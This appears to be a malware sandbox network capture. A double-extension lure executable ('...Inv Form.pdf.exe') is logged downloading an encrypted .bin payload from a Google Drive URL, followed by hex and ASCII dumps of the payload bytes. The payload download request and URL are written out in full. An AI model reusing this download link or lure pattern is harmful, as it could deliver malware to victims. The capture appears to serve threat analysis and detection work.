1	192.168.11.20	49806	142.250.186.97	443	C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-24 14:07:32 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-14-5s-docs.googleusercontent.com Connection: Keep-Alive
2021-11-24 14:07:32 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdtENFQgfeQ3Qdi39JZStFrIQZP2HWI7D0FrvZ9w1lBTDCTsIEuJYvCRyG4EvJZzWFzrGwrbaMWP2KYRBZPuIP0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="son of mercy_PLdsuNJGz44.bin";filename*=UTF-8''son%20of%20mercy_PLdsuNJGz44.bin Content-Length: 189504 Date: Wed, 24 Nov 2021 14:07:32 GMT Expires: Wed, 24 Nov 2021 14:07:32 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=B80/OQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-11-24 14:07:32 UTC	6	IN	Data Raw: c3 0c 32 ba e6 e0 c2 ae 91 99 e4 88 2a d2 d9 20 4b 74 3d a5 09 2d 41 51 02 06 fd 9b f0 99 07 79 2f 07 98 dd 31 2d 35 ec 30 5f ab f2 d5 24 47 55 98 8c e1 c9 6b 7b 11 f0 0b 95 2b 65 dd cc 2f 77 e7 b9 23 ee db 85 6a e0 4c 50 c7 e8 09 23 2c 01 14 2b 54 66 a5 7f b0 2f c6 4d 73 8b f5 a6 8b 5c 3e 3e 22 e0 1d e7 b3 52 13 1d 58 61 48 81 af 7b ac 63 bb 55 4f ef b1 ed 59 a3 61 9c de 48 a4 0d 5f 02 f0 b3 a0 89 dd 7f a6 69 f8 7f 9c eb ca 18 a2 41 67 54 18 21 77 dc 4b 2c 25 7f aa 92 b8 21 96 c9 c7 36 08 4d e0 a4 70 a2 d6 85 e0 e9 82 01 2a 1d 6b 31 0d 51 d7 78 ef 5b 68 a3 22 01 51 53 45 51 14 c8 6c 1f 6a 4b c8 b1 61 73 5f 9c 1d 6d 5e e3 ab 11 82 b4 3d a5 af d0 da cc e1 f5 68 d8 ae 22 9a 93 4c f3 f8 bb c9 b1 54 d3 51 70 8b b2 14 6b 3b 5b a5 eb a7 90 e3 6c 6a 3f f7 2b 23 Data Ascii: 2* Kt=-AQy/1-50_$GUk{+e/w#jLP#,+Tf/Ms\>>"RXaH{cUOYaH_iAgT!wK,%!6Mp*k1Qx[h"QSEQljKas_m^=h"LTQpk;[lj?+#
2021-11-24 14:07:32 UTC	9	IN	Data Raw: 5a 10 fb 5b 22 77 af 73 e9 09 e5 05 07 49 1b 63 82 b4 18 7a 20 4e 3f 15 68 2f da b2 7d 15 a3 6e be 09 fb bf ea 78 7e 12 7b 02 13 fb eb 2f 40 39 97 32 c7 2b df 99 1c eb 40 ee 73 3e a1 7d 93 15 b0 3d 3b 4e f3 13 cc b6 52 3e 7e ae 6d 9d 1a 48 9a 76 77 df 8f dd 4b c6 ed a2 db f3 a1 47 7b da 87 9d bd a3 1e b9 de 97 22 67 e3 6f c0 bb 0f 3a f1 82 f1 2d ae 82 57 42 1a 02 87 82 ed 2f 3a c7 95 d6 d1 23 4b b1 5b eb c0 04 32 c0 78 ac 89 d0 a0 3b 3b 24 5c 3d 07 77 d6 d8 a9 18 e2 82 27 23 59 87 ba 8f 2b 8a 8f 35 af 6e 86 70 1d de 6a 16 38 a2 4a 54 78 65 51 1f ec 58 fb f6 98 be 12 29 aa 77 d1 b8 23 ca 1a c6 50 1a 32 18 14 5f 4b 6e 9a d4 1f db c7 09 19 d7 4d bb fa bb ea 74 47 80 db b0 63 2e a2 82 f9 72 2a 9e ea 0f c4 aa 07 31 28 64 f2 e4 90 cc 4c 72 ed e7 91 46 1f 2a 16 Data Ascii: Z["wsIcz N?h/}nx~{/@92+@s>}=;NR>~mHvwKG{"go:-WB/:#K[2x;;$\=w'#Y+5npj8JTxeQX)w#P2_KnMtGc.r1(dLrF
2021-11-24 14:07:32 UTC	13	IN	Data Raw: 22 d4 49 4a 14 6b 66 2a 54 0b 86 e0 4b 42 10 1d a8 e0 30 df d0 16 b8 71 48 f1 02 48 40 a3 1a cb 06 58 9e ec a6 5a f4 9d a7 bc 8b ef 97 8e 10 bd 80 fd c3 9b ce 71 4c 82 6f b6 86 2d d6 b0 e1 10 6c 60 ab 4b e2 b6 7f 96 a5 b8 e5 4f c2 14 e2 a8 55 b3 19 92 db 69 04 44 44 81 8a 65 55 0a 32 42 bb e4 f6 17 3d 6a 68 c1 4a 1a e7 57 93 19 62 3a 08 f7 80 00 be bd 11 8b 0d b7 6a f9 dc a9 29 48 52 cb 70 85 96 57 3a 70 04 c0 2f 49 29 10 e8 54 1e 07 59 1c f8 8e 5e b0 c5 64 73 f6 67 90 7e 3d d6 2b bb dc 94 a3 68 ec 40 1d df c6 e0 d1 3c 49 0c 7e b9 8d 03 d7 26 b4 b0 43 18 b9 00 e8 b4 9d 43 41 94 a9 9a ce 6e c3 e1 99 b9 63 2f ab 72 c3 57 a5 ef de b1 c8 b8 68 f6 09 f4 1a fa a8 2c 7e a9 45 31 fc 87 df b1 b1 6f 12 db 1d 37 95 e8 5c 91 57 a7 55 f8 2d fd 92 ef 84 fd 0b f3 e3 3f Data Ascii: "IJkf*TKB0qHH@XZqLo-l`KOUiDDeU2B=jhJWb:j)HRpW:p/I)TY^dsg~=+h@<I~&CCAnc/rWh,~E1o7\WU-?
2021-11-24 14:07:32 UTC	17	IN	Data Raw: d5 b7 47 5a 5b a7 c2 ab 2c b5 4a d4 19 cd cb 33 0c 1e ec ec 45 dd bb 94 ab 25 8b d0 4c 4c cb b7 ab dc b3 2c c3 c6 3e 44 3c 4f 12 8a ec 6c cf fb f6 e5 a7 b2 48 f0 ec 98 6d ca a6 6f 3e 72 eb dd f5 1f 72 1b f9 1c f7 7a d3 2e 9f 46 8c 2e 2e 57 a6 c4 05 88 95 25 e4 4d cc 4f 37 73 2a 94 a7 2b e0 55 ac cc bb a9 c9 fe 9b 7c aa 62 eb 2a 4b de 34 0d e2 3a 2b a0 86 f8 70 55 22 ad fd f4 bb 99 ce 78 ec 15 96 f0 2e c0 4c ba 1c 48 19 2e 95 a9 e1 aa 94 96 af a1 73 93 1b 10 23 a7 73 15 d3 ef 10 0a da 27 c7 0f d2 86 94 1a f8 ea fa 89 22 27 cb 16 5b 01 3d a5 f9 dd 5b 4c 76 e5 6e 03 01 99 61 39 91 44 1c 2a 89 11 a7 b2 64 3d f3 96 3b 53 e8 39 16 47 9b ec 6b a6 4e 61 1f c2 38 d0 5b 44 59 7e e9 ac e7 6a bb 6d 98 d3 48 40 99 49 e6 92 73 f3 4c 66 d3 c2 ab 1d 01 9f 16 db 16 f5 45 Data Ascii: GZ[,J3E%LL,>D<OlHmo>rrz.F..W%MO7s+U\|bK4:+pU"x.LH.s#s'"'[=[Lvna9D*d=;S9GkNa8[DY~jmH@IsLfE
2021-11-24 14:07:32 UTC	18	IN	Data Raw: 94 40 91 be 09 fb 8c 9e e0 7a 21 0a 16 98 a6 13 ee bb 29 56 cd cf aa 3c 66 1c eb 40 65 2f a6 a5 fc 74 ea b0 3d 3b c5 8f ab c8 77 99 36 bf 61 7d ae c5 c3 e7 8a f6 38 70 dd 4b c6 66 de 63 f7 60 80 73 e9 58 16 c0 4f df 46 c6 16 c5 98 e3 6f c0 88 53 82 f5 09 8c d1 9d db 4f 83 e5 0a 0e df 19 a4 67 37 54 2d c1 a2 ac 4e 5b eb c0 8f 4e 78 7c 2d 6a 2f a0 3b 3b af 00 a5 03 b6 19 c8 68 d3 ea b1 dc a8 04 6b 3b 6c d4 8a 8f 35 24 32 1e 74 dc 1d 62 25 c3 29 17 ac b9 9e 49 9e 0f a7 fb f6 98 8d 6e b1 ae f4 10 98 10 b3 e6 4f 2d e2 b9 65 1c 8e b4 21 13 a9 17 d4 43 71 1b d7 4d 50 fc 36 71 74 47 80 db 3b 1e da 63 7d f1 f3 cd 61 ea 0f c4 21 7b 89 2c a5 3d f4 1b 12 8d 89 fd 66 72 b9 1f 2a 16 af 19 0c 3c 32 10 4f fc 68 36 0f d2 f1 e0 42 1c 3c 06 21 bf fe b8 f2 46 62 d3 b7 83 9e Data Ascii: @z!)V<f@e/t=;w6a}8pKfc`sXOFoSOg7T-N[Nx\|-j/;;hk;l5$2tb%)InO-e!CqMP6qtG;c}a!{,=fr*<2Oh6B<!Fb
2021-11-24 14:07:32 UTC	19	IN	Data Raw: 4f d2 71 1b d7 f6 bf 94 1a 4e dc e7 8c 31 e7 95 1b cf 4d 35 61 6d 7c dc 41 b1 a0 b6 a5 a9 ef ac af 82 c8 67 77 e2 01 9f 74 40 8d 96 6d 0e 4a 24 5b 48 6d 6e 5c 27 25 f8 f4 37 b5 c8 42 95 44 51 68 64 46 6d 23 c0 eb 43 d7 36 87 8c 36 19 ed f7 5e de 33 c3 a7 3b f6 9d db 97 2f 1e 17 c8 f0 5b d7 c2 fd 5d e2 05 bc af a3 8d fe 43 7c 93 9c 0a 10 ab 46 1b 1f 49 80 58 30 7d 3c 25 9e 43 e0 d4 6e 88 a0 b5 c9 84 b8 71 c5 c1 10 7a 79 f8 2c d3 b5 21 07 bf 94 6b 70 ce cf 57 63 e3 ed 22 99 fc 00 4b 01 a1 b8 39 aa 28 86 ed 15 bb 44 26 d8 ff c9 b7 b3 74 a7 4e e4 f0 c9 75 27 33 16 e8 7c 5c e0 b4 c9 55 09 4e f0 59 44 f7 c0 ba a7 50 d1 92 c1 de 72 93 08 e7 29 2c e2 bc 7d e5 1c f3 99 0d 65 9e 76 b2 aa e8 3f d4 e0 c1 71 e5 b8 eb c3 22 e1 7d 3a e3 5a ee c3 6a d9 db a5 af dc 6c f7 Data Ascii: OqN1M5am\|Agwt@mJ$[Hmn\'%7BDQhdFm#C66^3;/[]C\|FIX0}<%Cnqzy,!kpWc"K9(D&tNu'3\|\UNYDPr),}ev?q"}:Zjl
2021-11-24 14:07:32 UTC	20	IN	Data Raw: 27 21 16 24 13 c6 6f 1b c3 49 cf 93 3e 96 26 2f 5d e6 97 d9 5b 69 bc 38 04 37 85 6a e0 17 83 a1 5d c3 9b 24 d9 5f f2 82 a5 b5 3b cd b8 82 ce 4c 19 38 48 41 09 b5 d2 73 b6 4a 6c ce 5a 98 aa 80 66 48 81 24 fd b8 43 bb 55 cc 17 b3 99 5c 20 99 98 6b 37 c2 ca 14 15 7b bd c6 fa 91 4e b5 d1 72 b5 71 ea 9e 70 98 f4 c3 1c b6 0a 12 ae 2a ca 8b 3c eb fc d6 1f 6f 7f 3d 37 28 3f c7 47 cf 17 fc a7 a4 f5 39 7d c5 73 0f df a5 48 fa 72 cb d8 ac af a1 f9 53 26 eb 20 59 2a 68 8a 8f 0a 23 59 20 47 f5 fd 11 d4 fa b0 8e 90 ad 28 5b 97 d4 b4 33 75 0d e3 98 41 7a 22 61 7b c8 69 dc 50 c8 8f df 8b 96 ec ed 88 d0 4b fc dd b1 cb a7 90 e3 6c 6a 3f ac 74 7d 83 85 b8 ec 9d dc 6e 28 41 ed 84 bb c5 19 88 5c 6d c2 e9 0b 49 3e 98 d1 05 a2 a4 16 bf ff 26 48 a2 84 c2 ea e0 90 dc ec 55 58 5b Data Ascii: '!$oI>&/][i87j]$_;L8HAsJlZfH$CU\ k7{Nrqp<o=7(?G9}sHrS& Yh#Y G([3uAz"a{iPKlj?t}n(A\mI>&HUX[
2021-11-24 14:07:32 UTC	22	IN	Data Raw: 8e fb ae 83 f7 80 9d b5 27 07 84 fa 6d 3a 92 cb 99 ea e8 4a 6e 7e 16 54 b9 9a 60 b2 68 b1 6c b1 1f 6d df 98 05 a4 dd 1e af 1f e9 ce 60 89 f9 b6 e4 06 82 c7 18 1c a9 db af eb 97 d0 32 b9 03 14 a3 e3 31 29 b2 bf ea 29 f3 87 03 fc ec 04 b9 79 a8 9e f9 32 c7 a8 1b d1 9f 55 b4 e7 73 3e a1 f0 14 55 68 22 3b c7 75 4f c7 b6 52 4a 53 25 e3 05 11 48 9a f3 be ab ac 5e f5 52 e6 a2 db f3 d5 5d f2 95 af 16 33 3b 15 b9 de 1c b4 f3 e8 6f c0 ea 5d 6a 19 b7 8c 2c ae 01 93 4e 70 01 ed 83 2a 28 3b c7 95 d6 39 e0 28 b1 5b e4 76 c4 bb 87 0c 44 41 a2 a1 3b 51 24 d1 70 a3 26 5b 6f 31 5c e2 82 71 aa de 13 fe 8f 2b 62 8f b4 ae 6e d0 98 d7 a1 6b 16 bb 66 52 0f f1 22 71 d8 6b d0 fb f6 98 e2 12 29 aa 28 69 b9 23 ca 1a 98 db ff 6f db 4f 00 78 ae c4 5f fa 86 04 e7 fe 59 9e 33 af 30 06 Data Ascii: 'm:Jn~T`hlm`21))y2Us>Uh";uORJS%H^R]3;o]j,Np*(;9([vDA;Q$p&[o1\q+bnkfR"qk)(i#oOx_Y30
2021-11-24 14:07:32 UTC	23	IN	Data Raw: d7 7b 7c 2a 38 80 49 ed a2 dc af 92 5c 48 4c 99 22 2e 7f 65 cf a3 84 19 12 65 6f 7c ab f8 8a fb 34 cb 79 aa 78 07 09 1a 70 6c c3 67 38 ec 47 8d 44 2c 18 8b 3e 42 7b c2 98 46 7d a8 af 43 7e 0a b0 27 fc 67 5f 3b 2c e7 34 d5 c3 04 57 df 99 2c 0c 39 a8 42 20 36 9a a4 ec 63 be f2 df d8 26 a9 97 6a f0 d8 40 75 8c 74 68 dd 45 fa 1c ab 20 98 79 07 6e 0c 6a a6 66 a9 1c ce 7c 16 1e 25 97 ed 1a ce 71 c7 07 fe b2 d7 bd fa d4 30 09 25 f7 58 fc 3f 7d cb ee 6e 62 58 3b 0f 9d 00 3c ff 21 17 02 6c 6b 44 6f 80 44 ea 9d 8b 51 ed 28 f5 77 21 b1 44 d2 48 a1 1b 99 30 2d 5f cd 4b 3f db 5f c2 85 fd 72 88 fe 7e 3e e6 4d b5 b0 a7 96 9d 46 75 ab 2e c9 97 0d 04 ca 1e 31 02 e7 6e e6 ce 2e 4b 42 07 f4 e0 3e 17 7b 76 56 5d ce b2 08 95 eb a0 b0 20 32 fb 3a b6 dd be 8d 97 17 85 cc ed 84 Data Ascii: {\|*8I\HL".eeo\|4yxplg8GD,>B{F}C~'g_;,4W,9B 6c&j@uthE ynjf\|%q0%X?}nbX;<!lkDoDQ(w!DH0-_K?_r~>MFu.1n.KB>{vV] 2:
2021-11-24 14:07:32 UTC	24	IN	Data Raw: be 12 aa 6e 7b 16 39 1f ea 1a c6 51 1a 32 18 4a 00 78 ae c1 5f fa 86 04 56 2a 17 16 30 1f e6 29 80 c3 17 93 5a ec de b3 cd 9b c3 48 cb 61 e3 97 fc 8c 44 20 33 98 e4 fa c5 c1 cc c5 ed 91 46 48 7c fe e2 ba 94 38 99 db 2d dc c4 eb ba 91 8f 03 bd 97 61 0a 29 27 46 39 e8 f1 5c 6b 09 18 c1 c0 74 8d 8e 82 be 0c 88 30 2f 20 1b e4 ee 4e f2 f2 38 3d 8b 5c d6 ad dd e0 1d 8d b3 38 1b 4a 0e 89 c0 7e af 7b 2f a7 9b 06 19 07 5f 9f 58 a3 e2 58 16 17 fa b5 50 1d 4a bd fb 60 17 7e d2 5a 15 65 da bf 96 27 40 8c 9f 23 6a 4e 95 51 5e 0a 86 a3 9f dc d6 4e e2 9c e7 d8 ae 9f 9e ca 50 98 d0 ea ac d3 68 4b 47 18 0f 04 ae 12 c6 23 23 60 6b a2 22 8a 89 d0 2a b9 99 f9 f7 9c 66 f2 4d 2c 51 0d 37 55 5b d4 aa e2 66 a8 2b c1 b2 ba 5a d0 a1 b5 0f 38 64 61 30 22 9e f9 f9 31 c0 5f 58 3c 7a Data Ascii: n{9Q2Jx_V0)ZHaD 3FH\|8-a)'F9\kt0/ N8=\8J~{/_XXPJ`~Ze'@#jNQ^NPhKG##`k"fM,Q7U[f+Z8da0"1_X<z
2021-11-24 14:07:32 UTC	26	IN	Data Raw: 95 97 59 4a be 6d 17 8b 0d be b5 1b c0 6f ac 9e af b9 c2 be aa b7 75 df 7a ff 2d e4 3e 5f 17 d8 1f 4d 59 b0 fe 8e 5e 84 46 59 b4 c7 1d a7 e9 c2 a4 b4 15 c3 85 f1 85 db 42 1d 72 ce ed 0a 74 8e 04 2b 2c 89 03 9c 1a 8e 80 d3 6b 92 02 9a c6 0f ee e8 c7 06 e3 15 93 3c 4f 76 1b f9 dd 6c 9d 1e 27 cf 78 00 a4 dd 25 f9 9b ae c8 e5 05 8a cc 73 98 7d 4b 9b be 68 1e d7 ed 18 2e da 31 b9 11 20 96 ae 7f ae e8 d9 b1 2f 9f c7 47 41 00 14 d0 cd 6c 7b 60 4a ae b7 62 e3 14 10 88 fa 31 49 3f e1 14 b0 b0 b6 26 08 ec 33 e7 04 d6 8b 5b 92 62 29 9a c8 fb f2 b7 70 22 b4 96 60 2f b3 08 5e b8 2a bc 0e 8a 55 bf 6c b8 de 1a b7 0f 18 90 3f e9 59 d2 3e 77 0e d2 2d 46 7f 1d 97 87 ef 79 12 d0 52 3b 96 d6 d1 73 a3 7b 36 ea c0 8f b4 98 73 ac 89 53 64 33 be e4 28 18 61 f4 ee d8 dd 07 b2 6a Data Ascii: YJmouz->_MY^FYBrt+,k<Ovl'x%s}Kh.1 /GAl{`Jb1I?&3[b)p"`/^*Ul?Y>w-FyR;s{6sSd3(aj
2021-11-24 14:07:32 UTC	27	IN	Data Raw: 6b c4 0b fb 2d 12 97 63 28 d2 93 2e 06 31 d5 74 22 e5 3e 67 60 5a a1 a5 26 21 ad 9b 81 5d dd b4 7c bb 04 0d f5 eb 94 bb a2 4d e4 23 0d e3 6c 6a bf 0e c2 2c 8c 89 e5 2f cd b1 aa 14 ee 34 3f 97 f2 66 86 7a 6e 1e ed ab cc af 92 52 c1 f8 70 e6 78 14 1e 4c 21 43 95 8e c6 1c d6 ec 96 4f 32 ad f3 6f c8 e0 ec 22 f2 54 a5 06 f2 31 12 d2 72 28 5f 85 7c 5c 45 2d 16 b4 fe 90 69 db d5 d0 06 59 e4 90 e4 14 b0 17 dd cd c3 e8 77 fd d8 f7 32 79 dc 12 75 b6 3f f9 93 d9 a1 b6 ad 20 ef 7d 3d d0 1b 49 e7 96 39 64 1e d8 63 ec 52 4a e1 a2 58 a7 93 91 a3 c6 e0 f0 fe 1c c9 6c 16 1e 2b 1e 21 f3 0e 23 ac 8d 79 30 10 35 6e e6 43 a3 1a 20 0e 84 a6 d6 de 3d f6 e9 1d 5b ac 0e d8 23 90 71 2c ea b4 55 ad 13 0b 81 e6 ad 7e d2 29 18 fd ca ae 94 ee 6a d6 3d 95 b9 65 21 5f fd 53 bf cc 91 ae Data Ascii: k-c(.1t">g`Z&!]\|M#lj,/4?fznRpxL!CO2o"T1r(_\|\E-iYw2yu? }=I9dcRJXl+!#y05nC =[#q,U~)j=e!_S
2021-11-24 14:07:32 UTC	28	IN	Data Raw: 2e 38 45 5d 94 2f c6 fc a3 ba 4b 8a 3e cd 78 ac 04 46 6c 37 3b 24 0e 6a 02 97 9f d8 a9 48 1d 53 a2 e3 2c 98 31 ca d7 01 c2 cd 24 7e 0d 22 55 89 3b 46 c7 70 cf 94 0d 6e da 5a 10 d3 f3 7d c9 ea 42 d6 78 fc 94 40 18 0d 6e ce db 12 b9 49 1c 0f b4 bc 11 91 e3 50 cf 82 48 df 1d 44 28 32 54 1c 4c 80 db ef 3d a5 47 df 3a 83 06 a9 bb 0e 2d dd 68 63 1d 72 a7 6f 7c 4d a0 7a ef e7 91 15 94 77 1e 17 85 ad bb f7 d6 47 cf 9c 39 e0 2a 70 03 eb 4b 54 00 a8 e3 66 ec be 08 90 1d b3 f7 15 66 89 2d 1c 7f 2b e8 37 4c c2 bf 33 64 9b 42 f6 ca 34 7f 8b 5c 69 d6 a9 86 1c e7 b0 92 43 90 cd 99 b5 7e 50 2c fe 8b 30 36 4e ef 3c 68 a1 5e 9e 63 4e a0 cb 6b 50 1d f3 e1 a0 3d d4 3f 39 31 b2 33 51 9d f8 f9 47 77 bf d9 95 b1 f8 f8 4c 40 05 9f 0f d8 d5 8e b2 64 30 ab d5 c0 6a 9d 02 23 fb c3 Data Ascii: .8E]/K>xFl7;$jHS,1$~"U;FpnZ}Bx@nIPHD(2TL=G:-hcro\|MzwG9*pKTff-+7L3dB4\iC~P,06N<h^cNkP=?913QGwL@d0j#
2021-11-24 14:07:32 UTC	29	IN	Data Raw: 77 2d 63 f7 d4 0f dd a2 16 7b d3 29 18 70 de de 42 73 2c 2c b6 d7 58 29 7e 82 60 ca 57 1f 57 29 40 ed f3 c8 da d8 82 f9 f3 38 5e 7b 22 28 0f 61 55 0b 63 54 f8 84 26 9f b5 c9 c2 6f 4b ae b9 97 68 82 82 cf 8c a9 8c 7b ab a1 9c 3f 28 b0 a4 26 49 7f f5 be 96 a4 b7 81 00 3a f8 39 9c 65 5a db e0 e7 1f 71 6b f6 59 5d 41 93 bc b7 f4 d1 95 7e ae a2 c5 5f 33 be 77 42 32 a9 98 21 73 75 8e d7 f5 1b f9 19 3e 89 02 11 3e 94 f5 9a 42 c0 8b 9e 5a 30 eb d6 62 85 b7 5b 92 c8 57 a8 63 76 67 ae 49 11 fb 5b 57 71 50 f2 81 02 e5 05 8c c8 c3 64 82 b4 9d ba 54 5c bc ad 0c 0f da b2 7d 61 aa 3f 56 5e 0a 40 15 fb ba 16 26 c1 df 37 be a4 ac b8 7b 92 c5 2b df 12 59 e7 cb a6 7b 6d 92 a6 c5 7d 4e 3c 3b 4e 7e 96 ae 4b ad c1 4d 7c 3e cd 93 15 4a ff 3a 13 48 98 ef de ed a2 db 7a fc ef f2 Data Ascii: w-c{)pBs,,X)~`WW)@8^{"(aUcT&oKh{?(&I:9eZqkY]A~_3wB2!su>>BZ0b[WcvgI[WqPdT\}a?V^@&7{+Y{m}N<;N~KM\|>J:Hz
2021-11-24 14:07:32 UTC	31	IN	Data Raw: d4 0a ea 6e 40 77 a7 af 22 5e 91 4f 2a 41 fa e3 71 fc d6 72 e2 d2 74 0c 33 ff cb 3d 88 90 33 40 f9 65 8e 7f 74 b2 54 df c6 01 19 15 70 e8 0a e3 f1 c7 0a 55 bb 26 f0 a9 c6 8a 5a a5 ac 51 0b 40 bf 32 8d 54 53 1c 12 aa a2 19 db e5 d0 a4 21 fc 7d 6c 8e 98 0c 56 62 a3 d2 66 1e fb 64 ac 34 32 ce e1 d4 3b 61 7e 02 2b a1 9e b7 a9 93 64 1f 34 ce 5b 2f 7d 66 ba 1c 0d 6f 0e 21 11 53 02 12 7e 09 98 7f b1 79 85 73 e8 da 91 58 75 f0 73 dc f4 e3 db c2 d2 8c 12 9e 18 96 2a 9a da 05 04 18 e8 9e 0e 6f 03 7c 78 94 2a 01 02 57 d5 5d 81 60 bf 7a 29 34 c3 82 51 28 0c 71 58 5b af 1c 7e d9 ae e6 63 52 4f e1 6e c8 a3 e2 81 82 de db 32 0f 4f 08 7d d9 58 64 4e 88 d0 b2 5b ee da 8e f6 a1 9d b6 93 19 8a f0 7d cb 9e 93 54 fd e0 af 54 88 ed 97 df d8 e0 2f d9 f0 f9 fd 1f 6a ab 53 5d 78 Data Ascii: n@w"^OAqrt3=3@etTpU&ZQ@2TS!}lVbfd42;a~+d4[/}fo!S~ysXuso\|x*W]`z)4Q(qX[~cROn2O}XdN[}TT/jS]x
2021-11-24 14:07:32 UTC	32	IN	Data Raw: ea 3a 73 3c ce 0a 03 b8 b4 db 2e fe 57 e6 e9 19 c1 ca 72 f7 26 98 a9 48 4f bd ae e2 e3 d4 54 42 8a 83 e8 b3 9a 4e b1 ab 9e 1b 37 ef 60 44 2e f1 c5 0e 08 bf 25 2e 7b 00 36 18 8b 97 02 14 72 4e c4 1c 86 d5 a3 b2 c4 2f e8 49 54 3a 40 81 53 fd d3 29 6b 37 1d 4c 48 14 4e 86 dc dc 16 db d2 2f 56 50 be ea 83 24 0e d3 cb 50 91 0c 3e 14 5e 93 9d 4c a0 c3 44 f8 9c 45 6b ef d1 ab f2 18 47 31 5d a9 fe 81 b0 a3 33 6f b2 53 93 62 14 2d 4f 3e 7d a3 84 1b ae c9 30 49 df 38 b2 c3 eb e6 7b c3 a3 25 4f 9c a4 ec 88 79 8b 69 ea e8 86 d4 2a fe b8 5c 67 7b b4 94 4c b5 1a 99 e4 18 16 17 aa ef 2c 31 97 b1 a3 d7 7e df e6 ae 6b 7a 74 76 b3 25 6c 0e df ea 5f ec 3f 8a ee 0a b1 f7 bb 8a 4e a3 64 7b fc 63 dd ef b6 3e ca a2 9a 4d f2 24 10 b6 72 d2 4a 3d ab b0 15 67 4a ba 67 1e d1 31 44 Data Ascii: :s<.Wr&HOTBN7`D.%.{6rN/IT:@S)k7LHN/VP$P>^LDEkG1]3oSb-O>}0I8{%Oyi*\g{L,1~kztv%l_?Nd{c>M$rJ=gJg1D
2021-11-24 14:07:32 UTC	33	IN	Data Raw: 1c 0c e3 15 fe eb bf 9c 1c ea ac 76 94 2d a9 c0 ec 97 5c ac e3 e6 dd 84 2e 8f 6f 1a 2b 65 71 65 cd 20 2f 3f 76 e3 3f cf 9f dd bd df 21 a1 8a d6 e0 a0 6b de 5f e9 29 5b ac 0a d0 7a 55 a4 b4 76 24 b0 fa 17 0b 7f eb 62 71 92 aa da 7c ba 94 d5 dd 04 19 c4 84 72 bd 19 52 0b 39 b8 1e 22 8d 0f fb f5 f0 ab f3 c8 32 f1 31 14 2c 73 c3 4d bf ad 0b fc c2 58 fc 36 14 8b 6a 89 6e b6 cf 2e 28 be 0a c6 3b 86 28 64 ac b1 00 0d 27 40 6a 37 1f 80 79 06 60 4a b5 3c 6d 8b 9f be 5d cd 71 5c cd b4 c3 53 44 69 22 2c 00 c3 d5 0c e2 4c 83 c2 5a e9 9f 93 58 ef ac 24 ef b2 c8 61 48 79 75 0d 4d be 19 b1 30 af 1f 53 84 